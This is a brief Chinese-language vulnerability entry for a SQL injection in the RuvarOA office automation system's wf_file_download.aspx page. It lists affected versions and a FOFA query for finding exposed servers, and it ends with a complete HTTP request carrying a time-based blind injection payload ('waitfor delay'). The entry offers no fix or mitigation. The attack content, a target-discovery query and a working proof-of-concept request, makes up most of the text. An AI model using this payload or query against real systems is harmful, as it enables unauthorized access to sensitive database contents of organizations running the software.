RuvarOA wf_file_download存在SQL注入漏洞
一、漏洞简介
RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合,基于Windows平台,构建在大型关系数据库管理系统基础上的,以行政办公为核心,以集成融通业务办公为目标,将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。RuvarOA wf_file_download存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
二、影响版本
- RuvarOA v6.01
- RuvarOA v12.01
三、资产测绘
- fofa
body="txt_admin_key" - 特征
四、漏洞复现
GET /Mobile/WorkFlow/wf_file_download.aspx?attach_type=1&sys_file_storage_id=1+waitfor+delay+'0:0:3'+--+ HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.4103.116 Safari/537.36
Host:
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close